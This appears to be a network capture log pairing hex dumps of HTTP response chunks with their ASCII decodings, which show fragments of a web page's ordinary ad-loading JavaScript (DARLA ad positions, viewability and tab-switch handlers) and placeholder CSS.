                                                                                                                                                                        2023-06-02 11:13:21 UTC776INData Raw: 6e 2e 69 6e 64 65 78 4f 66 28 77 50 6f 73 29 20 3d 3d 3d 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 69 73 4e 6f 6e 55 42 41 61 64 42 6c 6f 63 6b 50 6f 73 20 3d 20 66 61 6c 73 65 20 26 26 20 69 73 57 68 69 74 65 6c 69 73 74 65 64 4e 6f 6e 55 42 41 50 6f 73 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 69 73 47 65 6d 69 6e 69 46 65 64 50 6f 73 20 3d 20 66 61 6c 73 65 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 70 6f 73 50 72 65 66 69 78 20 3d 20 70 6f 73 69 74 69 6f 6e 2e 73 70 6c 69 74 28 27 2d 27 29 5b 30 5d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 74 79 70 65 6f 66 20 67 65 6d 69 6e 69 46 65 64 50 6f 73 2e
                                                                                                                                                                        Data Ascii: n.indexOf(wPos) === 0; }); } var isNonUBAadBlockPos = false && isWhitelistedNonUBAPos; var isGeminiFedPos = false; var posPrefix = position.split('-')[0]; if (typeof geminiFedPos.
                                                                                                                                                                        2023-06-02 11:13:21 UTC777INData Raw: 20 20 20 20 20 20 20 69 66 20 28 70 6f 73 53 65 74 74 69 6e 67 2e 77 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 6e 61 54 65 78 74 2e 73 74 79 6c 65 2e 77 69 64 74 68 20 3d 20 70 6f 73 53 65 74 74 69 6e 67 2e 77 20 2b 20 27 70 78 27 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 75 62 61 43 6c 65 61 6e 20 26 26 20 75 62 61 43 6c 65 61 6e 2e 63 6c 61 73 73 4c 69 73 74 20 26 26 20 75 62 61 43 6c 65 61 6e 2e 63 6c 61 73 73 4c 69 73 74 2e 63 6f 6e 74 61 69 6e 73 20 26 26 20 21 75 62 61 43 6c 65 61 6e 2e 63 6c 61 73 73 4c 69 73 74 2e 63 6f 6e 74 61 69
                                                                                                                                                                        Data Ascii: if (posSetting.w) { inaText.style.width = posSetting.w + 'px'; } if (ubaClean && ubaClean.classList && ubaClean.classList.contains && !ubaClean.classList.contai
                                                                                                                                                                        2023-06-02 11:13:21 UTC778INData Raw: 6e 49 64 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 63 6c 61 73 73 4c 69 73 74 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6c 65 61 6e 49 64 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 70 6f 73 69 74 69 6f 6e 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 6e 6f 64 65 49 64 44 69 76 20 26 26 20 70 6f 73 49 74 65 6d 20 26 26 20 70 6f 73 49 74 65 6d 2e 73 65 72 76 65 54 79 70 65 20 21 3d 20 31 30 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6e 6f 64 65 49 64 44 69 76 2e 73 74 79 6c 65 2e 64 69 73 70 6c 61 79 20 3d 20 27 62 6c 6f 63 6b 27 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20
                                                                                                                                                                        Data Ascii: nId.parentNode.classList) { cleanId.parentNode.classList.add(position); } if (nodeIdDiv && posItem && posItem.serveType != 10) { nodeIdDiv.style.display = 'block'; }
                                                                                                                                                                        2023-06-02 11:13:21 UTC780INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 6e 65 77 20 43 75 73 74 6f 6d 45 76 65 6e 74 28 22 61 64 73 3a 66 69 6e 69 73 68 3a 70 61 72 73 65 22 2c 20 65 76 74 44 65 74 61 69 6c 29 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 7d 3b 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 43 2e 6f 6e 53 74 61 72 74 50 6f 73 52 65 6e 64 65 72 20 3d 20 66 75 6e 63 74 69 6f 6e 28 70 6f 73 49 74 65 6d 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 77 69 6e 64 6f 77 2e 70 65 72 66 6f 72 6d 61 6e 63 65 20 20 26 26 20 77 69 6e 64 6f 77 2e 70 65 72 66 6f 72 6d 61 6e
                                                                                                                                                                        Data Ascii: } dispatchEvent(new CustomEvent("ads:finish:parse", evtDetail)); } }; C.onStartPosRender = function(posItem) { if (window.performance && window.performan
                                                                                                                                                                        2023-06-02 11:13:21 UTC781INData Raw: 61 72 65 6e 74 4e 6f 64 65 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 65 6c 65 6d 65 6e 74 20 26 26 20 65 6c 65 6d 65 6e 74 2e 63 6c 61 73 73 4e 61 6d 65 20 26 26 20 65 6c 65 6d 65 6e 74 2e 63 6c 61 73 73 4e 61 6d 65 2e 6d 61 74 63 68 28 2f 48 74 2d 70 6c 2d 4c 44 52 42 7c 48 74 2d 70 6c 2d 4c 52 45 43 2f 29 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 65 6c 65 6d 65 6e 74 2e 63 6c 61 73 73 4e 61 6d 65 20 3d 20 65 6c 65 6d 65 6e 74 2e 63 6c 61 73 73 4e 61 6d 65 2e 72 65 70 6c 61 63 65 28 2f 48 74 2d 70 6c 2d 4c 44 52 42 7c 48 74 2d 70 6c 2d 4c 52 45 43 2f 2c 20 27 27 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 20 65 6c 73 65 20 69 66 20 28 65 6c 65 6d 65
                                                                                                                                                                        Data Ascii: arentNode; if (element && element.className && element.className.match(/Ht-pl-LDRB|Ht-pl-LREC/)) { element.className = element.className.replace(/Ht-pl-LDRB|Ht-pl-LREC/, ''); } else if (eleme
                                                                                                                                                                        2023-06-02 11:13:21 UTC782INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 77 69 6e 64 6f 77 2e 5f 69 73 4d 6f 64 61 6c 4f 70 65 6e 20 26 26 20 77 69 6e 64 6f 77 2e 5f 69 73 4d 6f 64 61 6c 4f 70 65 6e 28 29 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 5f 70 65 72 66 4d 61 72 6b 28 27 41 44 45 4e 44 5f 27 20 2b 20 70 6f 73 49 64 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 61 64 49 6e 64 65 78 20 3d 20 77 69 6e 64 6f 77 2e 5f 70 65 6e 64 69 6e 67 41 64 73 2e 69 6e 64 65 78 4f 66 28 70 6f 73 49 64 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 61 64 49 6e 64 65 78 20 3e 3d 20 30 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                        Data Ascii: } if (window._isModalOpen && window._isModalOpen()) { window._perfMark('ADEND_' + posId); adIndex = window._pendingAds.indexOf(posId); if (adIndex >= 0) {
                                                                                                                                                                        2023-06-02 11:13:21 UTC784INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 27 64 61 2d 70 61 72 73 65 64 2d 6d 6f 64 61 6c 27 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 3b 0a 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 22 4f 4b 22 20 3d 3d 20 44 2e 63 6f 6e 66 69 67 28 43 29 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 2e 64 70 44 61 72 6c 61 50 72 6f 78 79 49 6e 69 74 69 61 6c 69 7a 65 64 20 3d 20 74 72 75 65 3b 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f
                                                                                                                                                                        Data Ascii: document.documentElement.classList.remove('da-parsed-modal'); } }; if ("OK" == D.config(C)) { w.dpDarlaProxyInitialized = true; setTimeout(functio
                                                                                                                                                                        2023-06-02 11:13:21 UTC785INData Raw: 20 20 20 20 20 20 20 20 20 20 20 73 6d 61 72 74 41 64 43 6f 6e 66 69 67 20 3d 20 4a 53 4f 4e 2e 70 61 72 73 65 28 73 6d 61 72 74 41 64 43 6f 6e 66 69 67 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73 6d 61 72 74 41 64 50 6f 73 69 74 69 6f 6e 73 20 3d 20 73 6d 61 72 74 41 64 43 6f 6e 66 69 67 2e 61 64 50 6f 73 69 74 69 6f 6e 73 20 7c 7c 20 5b 5d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73 6d 61 72 74 41 64 44 79 6e 61 6d 69 63 44 61 74 61 20 3d 20 73 6d 61 72 74 41 64 43 6f 6e 66 69 67 2e 64 79 6e 61 6d 69 63 44 61 74 61 20 7c 7c 20 7b 7d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 20 63 61 74 63 68 20 28 65 72 72 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2f 2f 20
                                                                                                                                                                        Data Ascii: smartAdConfig = JSON.parse(smartAdConfig); smartAdPositions = smartAdConfig.adPositions || []; smartAdDynamicData = smartAdConfig.dynamicData || {}; } catch (err) { //
                                                                                                                                                                        2023-06-02 11:13:21 UTC786INData Raw: 6c 65 6e 67 74 68 20 3e 20 30 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 70 72 65 66 65 74 63 68 65 64 50 6f 73 20 3d 20 44 41 52 4c 41 2e 70 72 65 66 65 74 63 68 65 64 28 29 3b 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 70 72 65 66 65 74 63 68 65 64 50 6f 73 2e 6c 65 6e 67 74 68 20 3c 3d 20 30 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 66 69 72 73 74 42 61 74 63 68 50 6f 73 20 3d 20 5b 5d 3b 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2f 2f 20 67 6f 65 73 20 74 68 72 6f 75 67 68 20 74 68 65 20 70 6f 73 69 74 69 6f 6e 73 20 69
                                                                                                                                                                        Data Ascii: length > 0) { var prefetchedPos = DARLA.prefetched(); if (prefetchedPos.length <= 0) { return; } var firstBatchPos = []; // goes through the positions i
                                                                                                                                                                        2023-06-02 11:13:21 UTC787INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 64 65 66 65 72 52 65 74 72 79 20 3e 20 6d 61 78 77 61 69 74 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 44 41 52 4c 41 2e 61 62 6f 72 74 28 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6c 65 61 72 49 6e 74 65 72 76 61 6c 28 69 6e 74 65 72 76 61 6c 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 44 41 52 4c 41 2e 72 65 6e 64 65 72 28 70 6f 73 29 3b 0a 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                        Data Ascii: } if (deferRetry > maxwait) { DARLA.abort(); clearInterval(interval); DARLA.render(pos);
                                                                                                                                                                        2023-06-02 11:13:21 UTC789INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 21 77 61 66 65 72 49 6e 73 74 61 6e 63 65 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 77 61 66 65 72 42 61 73 65 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 61 66 65 72 49 6e 73 74 61 6e 63 65 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 61 66 65 72 42 61 73 65 20 3d 20 77 61 66 65 72 49 6e 73 74 61 6e 63 65 2e 62 61 73 65 20 7c 7c 20 7b 7d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                        Data Ascii: if (!waferInstance) { return; } var waferBase; waferInstance.ready(function () { waferBase = waferInstance.base || {}; });
                                                                                                                                                                        2023-06-02 11:13:21 UTC790INData Raw: 20 20 20 20 20 20 42 54 4e 42 3a 20 27 42 54 4e 42 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 42 54 4e 43 3a 20 27 42 54 4e 43 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 42 54 4e 44 3a 20 27 42 54 4e 44 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 4e 45 34 41 3a 20 27 4e 45 34 41 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 4e 45 34 42 3a 20 27 4e 45 34 42 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 4e 45 34 43 3a 20 27 4e 45 34 43 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 4e 45 34 44 3a 20 27 4e 45 34 44 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 46 42 32 41 3a 20 27 46 42 32 41
                                                                                                                                                                        Data Ascii: BTNB: 'BTNB', BTNC: 'BTNC', BTND: 'BTND', NE4A: 'NE4A', NE4B: 'NE4B', NE4C: 'NE4C', NE4D: 'NE4D', FB2A: 'FB2A
                                                                                                                                                                        2023-06-02 11:13:21 UTC791INData Raw: 20 20 20 20 20 20 20 20 20 69 66 20 28 21 69 73 57 69 6e 64 6f 77 48 69 64 64 65 6e 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 61 72 6c 61 54 69 6d 65 53 74 61 6d 70 20 3d 20 67 65 74 43 75 72 72 65 6e 74 54 69 6d 65 28 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 73 57 69 6e 64 6f 77 48 69 64 64 65 6e 20 3d 20 74 72 75 65 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 3b 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 64 69 73 70 61 74 63 68 57 69 6e 64 6f 77 45 76 65 6e 74 20 3d 20 66
                                                                                                                                                                        Data Ascii: if (!isWindowHidden) { darlaTimeStamp = getCurrentTime(); isWindowHidden = true; return; } }; var dispatchWindowEvent = f
                                                                                                                                                                        2023-06-02 11:13:21 UTC792INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 79 69 65 6c 64 41 64 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 20 5b 5d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 61 64 50 6f 73 69 74 69 6f 6e 73 20 3d 20 4f 62 6a 65 63 74 2e 6b 65 79 73 28 43 2e 70 6f 73 69 74 69 6f 6e 73 29 20 7c 7c 20 5b 5d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 63 6c 69 65 6e 74 50 6f 73 20 3d 20 5b 5d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                        Data Ascii: if (yieldAdEnabled) { return []; } } var adPositions = Object.keys(C.positions) || []; var clientPos = [];
                                                                                                                                                                        2023-06-02 11:13:21 UTC794INData Raw: 20 20 20 20 20 72 65 74 75 72 6e 20 61 64 50 6f 73 69 74 69 6f 6e 73 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 3b 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 68 61 6e 64 6c 65 46 6f 63 75 73 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 64 6f 63 75 6d 65 6e 74 5b 76 69 73 69 62 69 6c 69 74 79 4d 65 74 61 2e 68 69 64 64 65 6e 5d 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 73 57 69 6e 64 6f 77 48 69 64 64 65 6e 20 3d 20 74 72 75 65 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 0a 20
                                                                                                                                                                        Data Ascii: return adPositions; }; var handleFocus = function () { if (document[visibilityMeta.hidden]) { isWindowHidden = true; return; }
                                                                                                                                                                        2023-06-02 11:13:21 UTC795INData Raw: 20 20 20 20 20 20 20 20 20 20 69 66 20 28 21 76 69 65 77 65 72 45 76 65 6e 74 53 65 74 74 69 6e 67 73 20 7c 7c 20 21 76 69 65 77 65 72 45 76 65 6e 74 53 65 74 74 69 6e 67 73 2e 70 73 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 61 74 63 68 57 69 6e 64 6f 77 45 76 65 6e 74 28 27 79 69 65 6c 64 41 64 3a 52 65 66 72 65 73 68 49 6e 56 69 65 77 27 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 20 65 6c 73 65 20 69 66 20 28 79 69 65 6c 64 41 64
                                                                                                                                                                        Data Ascii: if (!viewerEventSettings || !viewerEventSettings.ps) { dispatchWindowEvent('yieldAd:RefreshInView'); return; } } else if (yieldAd
                                                                                                                                                                        2023-06-02 11:13:21 UTC796INData Raw: 42 6f 6f 73 74 47 72 6f 75 70 43 6f 6e 66 5b 61 64 50 6f 73 5d 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 67 72 6f 75 70 41 64 73 49 6e 56 69 65 77 20 3d 20 74 72 75 65 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 61 64 42 6f 6f 73 74 47 72 6f 75 70 43 6f 6e 66 5b 61 64 50 6f 73 5d 2e 69 6e 76 69 65 77 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 5b 5d 2e 63 6f 6e 63 61 74 28 61 64 42 6f 6f 73 74 47 72 6f 75 70 43 6f 6e 66 5b 61 64 50 6f 73 5d 2e 69 6e 76 69 65 77 29
                                                                                                                                                                        Data Ascii: BoostGroupConf[adPos]) { var groupAdsInView = true; if (adBoostGroupConf[adPos].inview) { [].concat(adBoostGroupConf[adPos].inview)
                                                                                                                                                                        2023-06-02 11:13:21 UTC798INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 61 64 43 61 6c 6c 50 6f 73 69 74 69 6f 6e 73 2e 70 75 73 68 28 6e 41 64 50 6f 73 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                        Data Ascii: adCallPositions.push(nAdPos); } }); }
                                                                                                                                                                        2023-06-02 11:13:21 UTC799INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 65 73 74 3a 20 70 61 67 65 43 6f 6e 74 65 78 74 2e 62 75 63 6b 65 74 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 74 61 62 73 77 69 74 63 68 45 76 65 6e 74 20 3d 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 73 3a 20 20 20 20 20 61 64 43 61 6c 6c 50 6f 73 69 74 69 6f 6e 73 2e 6a 6f 69 6e 28 27 2c 27 29 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                        Data Ascii: test: pageContext.bucket }, }; var tabswitchEvent = { ps: adCallPositions.join(','),
                                                                                                                                                                        2023-06-02 11:13:21 UTC800INData Raw: 20 20 20 20 20 20 20 20 0a 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 77 2e 70 65 72 66 6f 72 6d 61 6e 63 65 20 20 26 26 20 77 2e 70 65 72 66 6f 72 6d 61 6e 63 65 2e 6e 6f 77 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 6c 74 69 6d 65 20 3d 20 77 2e 70 65 72 66 6f 72 6d 61 6e 63 65 2e 6e 6f 77 28 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 5f 61 64 4c 54 2e 70 75 73 68 28 5b 27 44 41 52 4c 41 5f 52 45 4e 44 27 2c 20 4d 61 74 68 2e 72 6f 75 6e 64 28 6c 74 69 6d 65 29 5d 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d
                                                                                                                                                                        Data Ascii: if (w.performance && w.performance.now) { var ltime = w.performance.now(); _adLT.push(['DARLA_REND', Math.round(ltime)]); }
                                                                                                                                                                        2023-06-02 11:13:21 UTC801INData Raw: 61 2d 77 66 2d 74 65 6d 70 6c 61 74 65 2d 61 6c 6c 6f 77 2d 72 65 72 65 6e 64 65 72 3d 31 20 64 61 74 61 2d 77 66 2d 74 65 6d 70 6c 61 74 65 2d 74 61 72 67 65 74 3d 23 63 6f 6e 74 65 6e 74 2d 76 69 65 77 65 72 20 64 61 74 61 2d 77 66 2d 73 74 61 74 65 2d 73 74 61 74 65 54 72 69 67 67 65 72 3d 5b 73 74 61 74 65 2e 73 68 6f 77 56 69 65 77 65 72 5d 3e 3c 2f 64 69 76 3e 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2f 2a 20 41 44 20 70 6c 61 63 65 20 68 6f 6c 64 65 72 20 2a 2f 0a 20 20 20 20 20 20 20 20 2e 48 74 2d 70 6c 2d 4c 44 52 42 3a 62 65 66 6f 72 65 2c 0a 20 20 20 20 20 20 20 20 2e 48 74 2d 70 6c 2d 4c 52 45 43 3a 62 65 66 6f 72 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3a 20 61 74 74 72 28 64 61 74 61 2d 63 6f 6e 74 65 6e
                                                                                                                                                                        Data Ascii: a-wf-template-allow-rerender=1 data-wf-template-target=#content-viewer data-wf-state-stateTrigger=[state.showViewer]></div><style> /* AD place holder */ .Ht-pl-LDRB:before, .Ht-pl-LREC:before { content: attr(data-conten
                                                                                                                                                                        2023-06-02 11:13:21 UTC803INData Raw: 7d 0a 20 20 20 20 20 20 20 20 2e 76 69 65 77 65 72 2d 6f 70 65 6e 20 23 4d 61 69 6e 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 6f 69 6e 74 65 72 2d 65 76 65 6e 74 73 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2f 2a 20 74 6f 20 66 69 78 20 74 68 65 20 69 73 73 75 65 20 77 68 65 6e 20 76 69 65 77 65 72 20 69 73 20 6f 70 65 6e 20 74 68 65 20 76 69 64 65 6f 73 20 69 6e 20 73 74 72 65 61 6d 20 73 6f 6d 65 74 69 6d 65 73 20 61 70 70 65 61 72 20 75 6e 64 65 72 6e 65 61 74 68 20 2a 2f 0a 20 20 20 20 20 20 20 20 2e 76 69 65 77 65 72 2d 6f 70 65 6e 20 23 4d 61 69 6e 20 2e 77 61 66 65 72 2d 79 76 69 64 65 6f 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 20 20 20 20 7d 0a
                                                                                                                                                                        Data Ascii: } .viewer-open #Main { pointer-events: none; } /* to fix the issue when viewer is open the videos in stream sometimes appear underneath */ .viewer-open #Main .wafer-yvideo { display: none; }
